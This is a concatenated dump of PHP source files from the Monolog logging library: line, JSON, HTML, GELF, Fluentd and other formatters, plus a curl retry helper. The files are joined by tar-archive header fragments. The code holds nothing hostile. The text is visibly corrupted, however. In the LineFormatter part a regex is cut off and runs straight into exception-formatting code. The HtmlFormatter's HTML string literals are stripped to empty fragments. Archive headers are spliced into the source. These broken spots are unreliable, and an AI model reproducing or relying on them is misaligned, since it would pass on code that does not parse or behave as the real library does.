static::SIMPLE_FORMAT : $format; $this->allowInlineLineBreaks = $allowInlineLineBreaks; $this->ignoreEmptyContextAndExtra = $ignoreEmptyContextAndExtra; $this->includeStacktraces($includeStacktraces); parent::__construct($dateFormat); } public function includeStacktraces(bool $include = true, ?callable $parser = null): self { $this->includeStacktraces = $include; if ($this->includeStacktraces) { $this->allowInlineLineBreaks = true; $this->stacktracesParser = $parser; } return $this; } public function allowInlineLineBreaks(bool $allow = true): self { $this->allowInlineLineBreaks = $allow; return $this; } public function ignoreEmptyContextAndExtra(bool $ignore = true): self { $this->ignoreEmptyContextAndExtra = $ignore; return $this; } /** * {@inheritDoc} */ public function format(array $record): string { $vars = parent::format($record); $output = $this->format; foreach ($vars['extra'] as $var => $val) { if (false !== strpos($output, '%extra.'.$var.'%')) { $output = str_replace('%extra.'.$var.'%', $this->stringify($val), $output); unset($vars['extra'][$var]); } } foreach ($vars['context'] as $var => $val) { if (false !== strpos($output, '%context.'.$var.'%')) { $output = str_replace('%context.'.$var.'%', $this->stringify($val), $output); unset($vars['context'][$var]); } } if ($this->ignoreEmptyContextAndExtra) { if (empty($vars['context'])) { unset($vars['context']); $output = str_replace('%context%', '', $output); } if (empty($vars['extra'])) { unset($vars['extra']); $output = str_replace('%extra%', '', $output); } } foreach ($vars as $var => $val) { if (false !== strpos($output, '%'.$var.'%')) { $output = str_replace('%'.$var.'%', $this->stringify($val), $output); } } // remove leftover %extra.xxx% and %context.xxx% if any if (false !== strpos($output, '%')) { $output = preg_replace('/%(?:extra|context)\..+?%/', '', $output); if (null === $output) { $pcreErrorCode = preg_last_error(); throw new \RuntimeException('Failed to run preg_replace: ' . $pcreErrorCode . ' / ' . Utils::pcreLastErrorMessage($pcreErrorCode)); } } return $output; } public function formatBatch(array $records): string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } /** * @param mixed $value */ public function stringify($value): string { return $this->replaceNewlines($this->convertToString($value)); } protected function normalizeException(\Throwable $e, int $depth = 0): string { $str = $this->formatException($e); if ($previous = $e->getPrevious()) { do { $depth++; if ($depth > $this->maxNormalizeDepth) { $str .= "\n[previous exception] Over " . $this->maxNormalizeDepth . ' levels deep, aborting normalization'; break; } $str .= "\n[previous exception] " . $this->formatException($previous); } while ($previous = $previous->getPrevious()); } return $str; } /** * @param mixed $data */ protected function convertToString($data): string { if (null === $data || is_bool($data)) { return var_export($data, true); } if (is_scalar($data)) { return (string) $data; } return $this->toJson($data, true); } protected function replaceNewlines(string $str): string { if ($this->allowInlineLineBreaks) { if (0 === strpos($str, '{')) { $str = preg_replace('/(?getCode(); if ($e instanceof \SoapFault) { if (isset($e->faultcode)) { $str .= ' faultcode: ' . $e->faultcode; } if (isset($e->faultactor)) { $str .= ' faultactor: ' . $e->faultactor; } if (isset($e->detail)) { if (is_string($e->detail)) { $str .= ' detail: ' . $e->detail; } elseif (is_object($e->detail) || is_array($e->detail)) { $str .= ' detail: ' . $this->toJson($e->detail, true); } } } $str .= '): ' . $e->getMessage() . ' at ' . $e->getFile() . ':' . $e->getLine() . ')'; if ($this->includeStacktraces) { $str .= $this->stacktracesParser($e); } return $str; } private function stacktracesParser(\Throwable $e): string { $trace = $e->getTraceAsString(); if ($this->stacktracesParser) { $trace = $this->stacktracesParserCustom($trace); } return "\n[stacktrace]\n" . $trace . "\n"; } private function stacktracesParserCustom(string $trace): string { return implode("\n", array_filter(array_map($this->stacktracesParser, explode("\n", $trace)))); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/FormatterInterface.php000064400000001676147600400120023655 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * Interface for formatters * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger */ interface FormatterInterface { /** * Formats a log record. * * @param array $record A record to format * @return mixed The formatted record * * @phpstan-param Record $record */ public function format(array $record); /** * Formats a set of log records. * * @param array $records A set of records to format * @return mixed The formatted set of records * * @phpstan-param Record[] $records */ public function formatBatch(array $records); } google-api/vendor/monolog/monolog/src/Monolog/Formatter/NormalizerFormatter.php000064400000020057147600400120024071 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\DateTimeImmutable; use Monolog\Utils; use Throwable; /** * Normalizes incoming records to remove objects/resources so it's easier to dump to various targets * * @author Jordi Boggiano */ class NormalizerFormatter implements FormatterInterface { public const SIMPLE_DATE = "Y-m-d\TH:i:sP"; /** @var string */ protected $dateFormat; /** @var int */ protected $maxNormalizeDepth = 9; /** @var int */ protected $maxNormalizeItemCount = 1000; /** @var int */ private $jsonEncodeOptions = Utils::DEFAULT_JSON_FLAGS; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { $this->dateFormat = null === $dateFormat ? static::SIMPLE_DATE : $dateFormat; if (!function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s NormalizerFormatter'); } } /** * {@inheritDoc} * * @param mixed[] $record */ public function format(array $record) { return $this->normalize($record); } /** * {@inheritDoc} */ public function formatBatch(array $records) { foreach ($records as $key => $record) { $records[$key] = $this->format($record); } return $records; } public function getDateFormat(): string { return $this->dateFormat; } public function setDateFormat(string $dateFormat): self { $this->dateFormat = $dateFormat; return $this; } /** * The maximum number of normalization levels to go through */ public function getMaxNormalizeDepth(): int { return $this->maxNormalizeDepth; } public function setMaxNormalizeDepth(int $maxNormalizeDepth): self { $this->maxNormalizeDepth = $maxNormalizeDepth; return $this; } /** * The maximum number of items to normalize per level */ public function getMaxNormalizeItemCount(): int { return $this->maxNormalizeItemCount; } public function setMaxNormalizeItemCount(int $maxNormalizeItemCount): self { $this->maxNormalizeItemCount = $maxNormalizeItemCount; return $this; } /** * Enables `json_encode` pretty print. */ public function setJsonPrettyPrint(bool $enable): self { if ($enable) { $this->jsonEncodeOptions |= JSON_PRETTY_PRINT; } else { $this->jsonEncodeOptions &= ~JSON_PRETTY_PRINT; } return $this; } /** * @param mixed $data * @return null|scalar|array */ protected function normalize($data, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return 'Over ' . $this->maxNormalizeDepth . ' levels deep, aborting normalization'; } if (null === $data || is_scalar($data)) { if (is_float($data)) { if (is_infinite($data)) { return ($data > 0 ? '' : '-') . 'INF'; } if (is_nan($data)) { return 'NaN'; } } return $data; } if (is_array($data)) { $normalized = []; $count = 1; foreach ($data as $key => $value) { if ($count++ > $this->maxNormalizeItemCount) { $normalized['...'] = 'Over ' . $this->maxNormalizeItemCount . ' items ('.count($data).' total), aborting normalization'; break; } $normalized[$key] = $this->normalize($value, $depth + 1); } return $normalized; } if ($data instanceof \DateTimeInterface) { return $this->formatDate($data); } if (is_object($data)) { if ($data instanceof Throwable) { return $this->normalizeException($data, $depth); } if ($data instanceof \JsonSerializable) { /** @var null|scalar|array $value */ $value = $data->jsonSerialize(); } elseif (\get_class($data) === '__PHP_Incomplete_Class') { $accessor = new \ArrayObject($data); $value = (string) $accessor['__PHP_Incomplete_Class_Name']; } elseif (method_exists($data, '__toString')) { /** @var string $value */ $value = $data->__toString(); } else { // the rest is normalized by json encoding and decoding it /** @var null|scalar|array $value */ $value = json_decode($this->toJson($data, true), true); } return [Utils::getClass($data) => $value]; } if (is_resource($data)) { return sprintf('[resource(%s)]', get_resource_type($data)); } return '[unknown('.gettype($data).')]'; } /** * @return mixed[] */ protected function normalizeException(Throwable $e, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return ['Over ' . $this->maxNormalizeDepth . ' levels deep, aborting normalization']; } if ($e instanceof \JsonSerializable) { return (array) $e->jsonSerialize(); } $data = [ 'class' => Utils::getClass($e), 'message' => $e->getMessage(), 'code' => (int) $e->getCode(), 'file' => $e->getFile().':'.$e->getLine(), ]; if ($e instanceof \SoapFault) { if (isset($e->faultcode)) { $data['faultcode'] = $e->faultcode; } if (isset($e->faultactor)) { $data['faultactor'] = $e->faultactor; } if (isset($e->detail)) { if (is_string($e->detail)) { $data['detail'] = $e->detail; } elseif (is_object($e->detail) || is_array($e->detail)) { $data['detail'] = $this->toJson($e->detail, true); } } } $trace = $e->getTrace(); foreach ($trace as $frame) { if (isset($frame['file'])) { $data['trace'][] = $frame['file'].':'.$frame['line']; } } if ($previous = $e->getPrevious()) { $data['previous'] = $this->normalizeException($previous, $depth + 1); } return $data; } /** * Return the JSON representation of a value * * @param mixed $data * @throws \RuntimeException if encoding fails and errors are not ignored * @return string if encoding fails and ignoreErrors is true 'null' is returned */ protected function toJson($data, bool $ignoreErrors = false): string { return Utils::jsonEncode($data, $this->jsonEncodeOptions, $ignoreErrors); } /** * @return string */ protected function formatDate(\DateTimeInterface $date) { // in case the date format isn't custom then we defer to the custom DateTimeImmutable // formatting logic, which will pick the right format based on whether useMicroseconds is on if ($this->dateFormat === self::SIMPLE_DATE && $date instanceof DateTimeImmutable) { return (string) $date; } return $date->format($this->dateFormat); } public function addJsonEncodeOption(int $option): self { $this->jsonEncodeOptions |= $option; return $this; } public function removeJsonEncodeOption(int $option): self { $this->jsonEncodeOptions &= ~$option; return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/JsonFormatter.php000064400000013760147600400120022663 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Throwable; /** * Encodes whatever record data is passed to it as json * * This can be useful to log to databases or remote APIs * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger */ class JsonFormatter extends NormalizerFormatter { public const BATCH_MODE_JSON = 1; public const BATCH_MODE_NEWLINES = 2; /** @var self::BATCH_MODE_* */ protected $batchMode; /** @var bool */ protected $appendNewline; /** @var bool */ protected $ignoreEmptyContextAndExtra; /** @var bool */ protected $includeStacktraces = false; /** * @param self::BATCH_MODE_* $batchMode */ public function __construct(int $batchMode = self::BATCH_MODE_JSON, bool $appendNewline = true, bool $ignoreEmptyContextAndExtra = false, bool $includeStacktraces = false) { $this->batchMode = $batchMode; $this->appendNewline = $appendNewline; $this->ignoreEmptyContextAndExtra = $ignoreEmptyContextAndExtra; $this->includeStacktraces = $includeStacktraces; parent::__construct(); } /** * The batch mode option configures the formatting style for * multiple records. By default, multiple records will be * formatted as a JSON-encoded array. However, for * compatibility with some API endpoints, alternative styles * are available. */ public function getBatchMode(): int { return $this->batchMode; } /** * True if newlines are appended to every formatted record */ public function isAppendingNewlines(): bool { return $this->appendNewline; } /** * {@inheritDoc} */ public function format(array $record): string { $normalized = $this->normalize($record); if (isset($normalized['context']) && $normalized['context'] === []) { if ($this->ignoreEmptyContextAndExtra) { unset($normalized['context']); } else { $normalized['context'] = new \stdClass; } } if (isset($normalized['extra']) && $normalized['extra'] === []) { if ($this->ignoreEmptyContextAndExtra) { unset($normalized['extra']); } else { $normalized['extra'] = new \stdClass; } } return $this->toJson($normalized, true) . ($this->appendNewline ? "\n" : ''); } /** * {@inheritDoc} */ public function formatBatch(array $records): string { switch ($this->batchMode) { case static::BATCH_MODE_NEWLINES: return $this->formatBatchNewlines($records); case static::BATCH_MODE_JSON: default: return $this->formatBatchJson($records); } } /** * @return self */ public function includeStacktraces(bool $include = true): self { $this->includeStacktraces = $include; return $this; } /** * Return a JSON-encoded array of records. * * @phpstan-param Record[] $records */ protected function formatBatchJson(array $records): string { return $this->toJson($this->normalize($records), true); } /** * Use new lines to separate records instead of a * JSON-encoded array. * * @phpstan-param Record[] $records */ protected function formatBatchNewlines(array $records): string { $instance = $this; $oldNewline = $this->appendNewline; $this->appendNewline = false; array_walk($records, function (&$value, $key) use ($instance) { $value = $instance->format($value); }); $this->appendNewline = $oldNewline; return implode("\n", $records); } /** * Normalizes given $data. * * @param mixed $data * * @return mixed */ protected function normalize($data, int $depth = 0) { if ($depth > $this->maxNormalizeDepth) { return 'Over '.$this->maxNormalizeDepth.' levels deep, aborting normalization'; } if (is_array($data)) { $normalized = []; $count = 1; foreach ($data as $key => $value) { if ($count++ > $this->maxNormalizeItemCount) { $normalized['...'] = 'Over '.$this->maxNormalizeItemCount.' items ('.count($data).' total), aborting normalization'; break; } $normalized[$key] = $this->normalize($value, $depth + 1); } return $normalized; } if (is_object($data)) { if ($data instanceof \DateTimeInterface) { return $this->formatDate($data); } if ($data instanceof Throwable) { return $this->normalizeException($data, $depth); } // if the object has specific json serializability we want to make sure we skip the __toString treatment below if ($data instanceof \JsonSerializable) { return $data; } if (method_exists($data, '__toString')) { return $data->__toString(); } return $data; } if (is_resource($data)) { return parent::normalize($data); } return $data; } /** * Normalizes given exception with or without its own stack trace based on * `includeStacktraces` property. * * {@inheritDoc} */ protected function normalizeException(Throwable $e, int $depth = 0): array { $data = parent::normalizeException($e, $depth); if (!$this->includeStacktraces) { unset($data['trace']); } return $data; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/FluentdFormatter.php000064400000004260147600400120023346 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Utils; /** * Class FluentdFormatter * * Serializes a log message to Fluentd unix socket protocol * * Fluentd config: * * * type unix * path /var/run/td-agent/td-agent.sock * * * Monolog setup: * * $logger = new Monolog\Logger('fluent.tag'); * $fluentHandler = new Monolog\Handler\SocketHandler('unix:///var/run/td-agent/td-agent.sock'); * $fluentHandler->setFormatter(new Monolog\Formatter\FluentdFormatter()); * $logger->pushHandler($fluentHandler); * * @author Andrius Putna */ class FluentdFormatter implements FormatterInterface { /** * @var bool $levelTag should message level be a part of the fluentd tag */ protected $levelTag = false; public function __construct(bool $levelTag = false) { if (!function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s FluentdUnixFormatter'); } $this->levelTag = $levelTag; } public function isUsingLevelsInTag(): bool { return $this->levelTag; } public function format(array $record): string { $tag = $record['channel']; if ($this->levelTag) { $tag .= '.' . strtolower($record['level_name']); } $message = [ 'message' => $record['message'], 'context' => $record['context'], 'extra' => $record['extra'], ]; if (!$this->levelTag) { $message['level'] = $record['level']; $message['level_name'] = $record['level_name']; } return Utils::jsonEncode([$tag, $record['datetime']->getTimestamp(), $message]); } public function formatBatch(array $records): string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/FlowdockFormatter.php000064400000005065147600400120023521 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * formats the record to be used in the FlowdockHandler * * @author Dominik Liebler * @deprecated Since 2.9.0 and 3.3.0, Flowdock was shutdown we will thus drop this handler in Monolog 4 */ class FlowdockFormatter implements FormatterInterface { /** * @var string */ private $source; /** * @var string */ private $sourceEmail; public function __construct(string $source, string $sourceEmail) { $this->source = $source; $this->sourceEmail = $sourceEmail; } /** * {@inheritDoc} * * @return mixed[] */ public function format(array $record): array { $tags = [ '#logs', '#' . strtolower($record['level_name']), '#' . $record['channel'], ]; foreach ($record['extra'] as $value) { $tags[] = '#' . $value; } $subject = sprintf( 'in %s: %s - %s', $this->source, $record['level_name'], $this->getShortMessage($record['message']) ); $record['flowdock'] = [ 'source' => $this->source, 'from_address' => $this->sourceEmail, 'subject' => $subject, 'content' => $record['message'], 'tags' => $tags, 'project' => $this->source, ]; return $record; } /** * {@inheritDoc} * * @return mixed[][] */ public function formatBatch(array $records): array { $formatted = []; foreach ($records as $record) { $formatted[] = $this->format($record); } return $formatted; } public function getShortMessage(string $message): string { static $hasMbString; if (null === $hasMbString) { $hasMbString = function_exists('mb_strlen'); } $maxLength = 45; if ($hasMbString) { if (mb_strlen($message, 'UTF-8') > $maxLength) { $message = mb_substr($message, 0, $maxLength - 4, 'UTF-8') . ' ...'; } } else { if (strlen($message) > $maxLength) { $message = substr($message, 0, $maxLength - 4) . ' ...'; } } return $message; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/LogmaticFormatter.php000064400000002714147600400120023506 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * Encodes message information into JSON in a format compatible with Logmatic. * * @author Julien Breux */ class LogmaticFormatter extends JsonFormatter { protected const MARKERS = ["sourcecode", "php"]; /** * @var string */ protected $hostname = ''; /** * @var string */ protected $appname = ''; public function setHostname(string $hostname): self { $this->hostname = $hostname; return $this; } public function setAppname(string $appname): self { $this->appname = $appname; return $this; } /** * Appends the 'hostname' and 'appname' parameter for indexing by Logmatic. * * @see http://doc.logmatic.io/docs/basics-to-send-data * @see \Monolog\Formatter\JsonFormatter::format() */ public function format(array $record): string { if (!empty($this->hostname)) { $record["hostname"] = $this->hostname; } if (!empty($this->appname)) { $record["appname"] = $this->appname; } $record["@marker"] = static::MARKERS; return parent::format($record); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/GoogleCloudLoggingFormatter.php000064400000002152147600400120025455 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use DateTimeInterface; use Monolog\LogRecord; /** * Encodes message information into JSON in a format compatible with Cloud logging. * * @see https://cloud.google.com/logging/docs/structured-logging * @see https://cloud.google.com/logging/docs/reference/v2/rest/v2/LogEntry * * @author Luís Cobucci */ final class GoogleCloudLoggingFormatter extends JsonFormatter { /** {@inheritdoc} **/ public function format(array $record): string { // Re-key level for GCP logging $record['severity'] = $record['level_name']; $record['time'] = $record['datetime']->format(DateTimeInterface::RFC3339_EXTENDED); // Remove keys that are not used by GCP unset($record['level'], $record['level_name'], $record['datetime']); return parent::format($record); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/ScalarFormatter.php000064400000002210147600400120023143 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * Formats data into an associative array of scalar values. * Objects and arrays will be JSON encoded. * * @author Andrew Lawson */ class ScalarFormatter extends NormalizerFormatter { /** * {@inheritDoc} * * @phpstan-return array $record */ public function format(array $record): array { $result = []; foreach ($record as $key => $value) { $result[$key] = $this->normalizeValue($value); } return $result; } /** * @param mixed $value * @return scalar|null */ protected function normalizeValue($value) { $normalized = $this->normalize($value); if (is_array($normalized)) { return $this->toJson($normalized, true); } return $normalized; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/WildfireFormatter.php000064400000007541147600400120023517 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Logger; /** * Serializes a log message according to Wildfire's header requirements * * @author Eric Clemmons (@ericclemmons) * @author Christophe Coevoet * @author Kirill chEbba Chebunin * * @phpstan-import-type Level from \Monolog\Logger */ class WildfireFormatter extends NormalizerFormatter { /** * Translates Monolog log levels to Wildfire levels. * * @var array */ private $logLevels = [ Logger::DEBUG => 'LOG', Logger::INFO => 'INFO', Logger::NOTICE => 'INFO', Logger::WARNING => 'WARN', Logger::ERROR => 'ERROR', Logger::CRITICAL => 'ERROR', Logger::ALERT => 'ERROR', Logger::EMERGENCY => 'ERROR', ]; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { parent::__construct($dateFormat); // http headers do not like non-ISO-8559-1 characters $this->removeJsonEncodeOption(JSON_UNESCAPED_UNICODE); } /** * {@inheritDoc} * * @return string */ public function format(array $record): string { // Retrieve the line and file if set and remove them from the formatted extra $file = $line = ''; if (isset($record['extra']['file'])) { $file = $record['extra']['file']; unset($record['extra']['file']); } if (isset($record['extra']['line'])) { $line = $record['extra']['line']; unset($record['extra']['line']); } /** @var mixed[] $record */ $record = $this->normalize($record); $message = ['message' => $record['message']]; $handleError = false; if ($record['context']) { $message['context'] = $record['context']; $handleError = true; } if ($record['extra']) { $message['extra'] = $record['extra']; $handleError = true; } if (count($message) === 1) { $message = reset($message); } if (isset($record['context']['table'])) { $type = 'TABLE'; $label = $record['channel'] .': '. $record['message']; $message = $record['context']['table']; } else { $type = $this->logLevels[$record['level']]; $label = $record['channel']; } // Create JSON object describing the appearance of the message in the console $json = $this->toJson([ [ 'Type' => $type, 'File' => $file, 'Line' => $line, 'Label' => $label, ], $message, ], $handleError); // The message itself is a serialization of the above JSON object + it's length return sprintf( '%d|%s|', strlen($json), $json ); } /** * {@inheritDoc} * * @phpstan-return never */ public function formatBatch(array $records) { throw new \BadMethodCallException('Batch formatting does not make sense for the WildfireFormatter'); } /** * {@inheritDoc} * * @return null|scalar|array|object */ protected function normalize($data, int $depth = 0) { if (is_object($data) && !$data instanceof \DateTimeInterface) { return $data; } return parent::normalize($data, $depth); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/HtmlFormatter.php000064400000010641147600400120022651 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Logger; use Monolog\Utils; /** * Formats incoming records into an HTML table * * This is especially useful for html email logging * * @author Tiago Brito */ class HtmlFormatter extends NormalizerFormatter { /** * Translates Monolog log levels to html color priorities. * * @var array */ protected $logLevels = [ Logger::DEBUG => '#CCCCCC', Logger::INFO => '#28A745', Logger::NOTICE => '#17A2B8', Logger::WARNING => '#FFC107', Logger::ERROR => '#FD7E14', Logger::CRITICAL => '#DC3545', Logger::ALERT => '#821722', Logger::EMERGENCY => '#000000', ]; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format */ public function __construct(?string $dateFormat = null) { parent::__construct($dateFormat); } /** * Creates an HTML table row * * @param string $th Row header content * @param string $td Row standard cell content * @param bool $escapeTd false if td content must not be html escaped */ protected function addRow(string $th, string $td = ' ', bool $escapeTd = true): string { $th = htmlspecialchars($th, ENT_NOQUOTES, 'UTF-8'); if ($escapeTd) { $td = '
'.htmlspecialchars($td, ENT_NOQUOTES, 'UTF-8').'
'; } return "\n$th:\n".$td."\n"; } /** * Create a HTML h1 tag * * @param string $title Text to be in the h1 * @param int $level Error level * @return string */ protected function addTitle(string $title, int $level): string { $title = htmlspecialchars($title, ENT_NOQUOTES, 'UTF-8'); return '


'; } /** * Formats a log record. * * @return string The formatted record */ public function format(array $record): string { $output = $this->addTitle($record['level_name'], $record['level']); $output .= ''; $output .= $this->addRow('Message', (string) $record['message']); $output .= $this->addRow('Time', $this->formatDate($record['datetime'])); $output .= $this->addRow('Channel', $record['channel']); if ($record['context']) { $embeddedTable = '
'; foreach ($record['context'] as $key => $value) { $embeddedTable .= $this->addRow((string) $key, $this->convertToString($value)); } $embeddedTable .= '
'; $output .= $this->addRow('Context', $embeddedTable, false); } if ($record['extra']) { $embeddedTable = ''; foreach ($record['extra'] as $key => $value) { $embeddedTable .= $this->addRow((string) $key, $this->convertToString($value)); } $embeddedTable .= '
'; $output .= $this->addRow('Extra', $embeddedTable, false); } return $output.''; } /** * Formats a set of log records. * * @return string The formatted set of records */ public function formatBatch(array $records): string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } /** * @param mixed $data */ protected function convertToString($data): string { if (null === $data || is_scalar($data)) { return (string) $data; } $data = $this->normalize($data); return Utils::jsonEncode($data, JSON_PRETTY_PRINT | Utils::DEFAULT_JSON_FLAGS, true); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/GelfMessageFormatter.php000064400000012761147600400120024134 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Logger; use Gelf\Message; use Monolog\Utils; /** * Serializes a log message to GELF * @see http://docs.graylog.org/en/latest/pages/gelf.html * * @author Matt Lehner * * @phpstan-import-type Level from \Monolog\Logger */ class GelfMessageFormatter extends NormalizerFormatter { protected const DEFAULT_MAX_LENGTH = 32766; /** * @var string the name of the system for the Gelf log message */ protected $systemName; /** * @var string a prefix for 'extra' fields from the Monolog record (optional) */ protected $extraPrefix; /** * @var string a prefix for 'context' fields from the Monolog record (optional) */ protected $contextPrefix; /** * @var int max length per field */ protected $maxLength; /** * @var int */ private $gelfVersion = 2; /** * Translates Monolog log levels to Graylog2 log priorities. * * @var array * * @phpstan-var array */ private $logLevels = [ Logger::DEBUG => 7, Logger::INFO => 6, Logger::NOTICE => 5, Logger::WARNING => 4, Logger::ERROR => 3, Logger::CRITICAL => 2, Logger::ALERT => 1, Logger::EMERGENCY => 0, ]; public function __construct(?string $systemName = null, ?string $extraPrefix = null, string $contextPrefix = 'ctxt_', ?int $maxLength = null) { if (!class_exists(Message::class)) { throw new \RuntimeException('Composer package graylog2/gelf-php is required to use Monolog\'s GelfMessageFormatter'); } parent::__construct('U.u'); $this->systemName = (is_null($systemName) || $systemName === '') ? (string) gethostname() : $systemName; $this->extraPrefix = is_null($extraPrefix) ? '' : $extraPrefix; $this->contextPrefix = $contextPrefix; $this->maxLength = is_null($maxLength) ? self::DEFAULT_MAX_LENGTH : $maxLength; if (method_exists(Message::class, 'setFacility')) { $this->gelfVersion = 1; } } /** * {@inheritDoc} */ public function format(array $record): Message { $context = $extra = []; if (isset($record['context'])) { /** @var mixed[] $context */ $context = parent::normalize($record['context']); } if (isset($record['extra'])) { /** @var mixed[] $extra */ $extra = parent::normalize($record['extra']); } if (!isset($record['datetime'], $record['message'], $record['level'])) { throw new \InvalidArgumentException('The record should at least contain datetime, message and level keys, '.var_export($record, true).' given'); } $message = new Message(); $message ->setTimestamp($record['datetime']) ->setShortMessage((string) $record['message']) ->setHost($this->systemName) ->setLevel($this->logLevels[$record['level']]); // message length + system name length + 200 for padding / metadata $len = 200 + strlen((string) $record['message']) + strlen($this->systemName); if ($len > $this->maxLength) { $message->setShortMessage(Utils::substr($record['message'], 0, $this->maxLength)); } if ($this->gelfVersion === 1) { if (isset($record['channel'])) { $message->setFacility($record['channel']); } if (isset($extra['line'])) { $message->setLine($extra['line']); unset($extra['line']); } if (isset($extra['file'])) { $message->setFile($extra['file']); unset($extra['file']); } } else { $message->setAdditional('facility', $record['channel']); } foreach ($extra as $key => $val) { $val = is_scalar($val) || null === $val ? $val : $this->toJson($val); $len = strlen($this->extraPrefix . $key . $val); if ($len > $this->maxLength) { $message->setAdditional($this->extraPrefix . $key, Utils::substr((string) $val, 0, $this->maxLength)); continue; } $message->setAdditional($this->extraPrefix . $key, $val); } foreach ($context as $key => $val) { $val = is_scalar($val) || null === $val ? $val : $this->toJson($val); $len = strlen($this->contextPrefix . $key . $val); if ($len > $this->maxLength) { $message->setAdditional($this->contextPrefix . $key, Utils::substr((string) $val, 0, $this->maxLength)); continue; } $message->setAdditional($this->contextPrefix . $key, $val); } if ($this->gelfVersion === 1) { /** @phpstan-ignore-next-line */ if (null === $message->getFile() && isset($context['exception']['file'])) { if (preg_match("/^(.+):([0-9]+)$/", $context['exception']['file'], $matches)) { $message->setFile($matches[1]); $message->setLine($matches[2]); } } } return $message; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/Curl/Util.php000064400000003547147600400120021324 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\Curl; use CurlHandle; /** * This class is marked as internal and it is not under the BC promise of the package. * * @internal */ final class Util { /** @var array */ private static $retriableErrorCodes = [ CURLE_COULDNT_RESOLVE_HOST, CURLE_COULDNT_CONNECT, CURLE_HTTP_NOT_FOUND, CURLE_READ_ERROR, CURLE_OPERATION_TIMEOUTED, CURLE_HTTP_POST_ERROR, CURLE_SSL_CONNECT_ERROR, ]; /** * Executes a CURL request with optional retries and exception on failure * * @param resource|CurlHandle $ch curl handler * @param int $retries * @param bool $closeAfterDone * @return bool|string @see curl_exec */ public static function execute($ch, int $retries = 5, bool $closeAfterDone = true) { while ($retries--) { $curlResponse = curl_exec($ch); if ($curlResponse === false) { $curlErrno = curl_errno($ch); if (false === in_array($curlErrno, self::$retriableErrorCodes, true) || !$retries) { $curlError = curl_error($ch); if ($closeAfterDone) { curl_close($ch); } throw new \RuntimeException(sprintf('Curl error (code %d): %s', $curlErrno, $curlError)); } continue; } if ($closeAfterDone) { curl_close($ch); } return $curlResponse; } return false; } } vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ChannelLevelActivationStrategy.php000064400000004634147600400120030446 0ustar00google-api * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\FingersCrossed; use Monolog\Logger; use Psr\Log\LogLevel; /** * Channel and Error level based monolog activation strategy. Allows to trigger activation * based on level per channel. e.g. trigger activation on level 'ERROR' by default, except * for records of the 'sql' channel; those should trigger activation on level 'WARN'. * * Example: * * * $activationStrategy = new ChannelLevelActivationStrategy( * Logger::CRITICAL, * array( * 'request' => Logger::ALERT, * 'sensitive' => Logger::ERROR, * ) * ); * $handler = new FingersCrossedHandler(new StreamHandler('php://stderr'), $activationStrategy); * * * @author Mike Meessen * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class ChannelLevelActivationStrategy implements ActivationStrategyInterface { /** * @var Level */ private $defaultActionLevel; /** * @var array */ private $channelToActionLevel; /** * @param int|string $defaultActionLevel The default action level to be used if the record's category doesn't match any * @param array $channelToActionLevel An array that maps channel names to action levels. * * @phpstan-param array $channelToActionLevel * @phpstan-param Level|LevelName|LogLevel::* $defaultActionLevel */ public function __construct($defaultActionLevel, array $channelToActionLevel = []) { $this->defaultActionLevel = Logger::toMonologLevel($defaultActionLevel); $this->channelToActionLevel = array_map('Monolog\Logger::toMonologLevel', $channelToActionLevel); } /** * @phpstan-param Record $record */ public function isHandlerActivated(array $record): bool { if (isset($this->channelToActionLevel[$record['channel']])) { return $record['level'] >= $this->channelToActionLevel[$record['channel']]; } return $record['level'] >= $this->defaultActionLevel; } } vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ErrorLevelActivationStrategy.php000064400000002116147600400120030160 0ustar00google-api * * For the 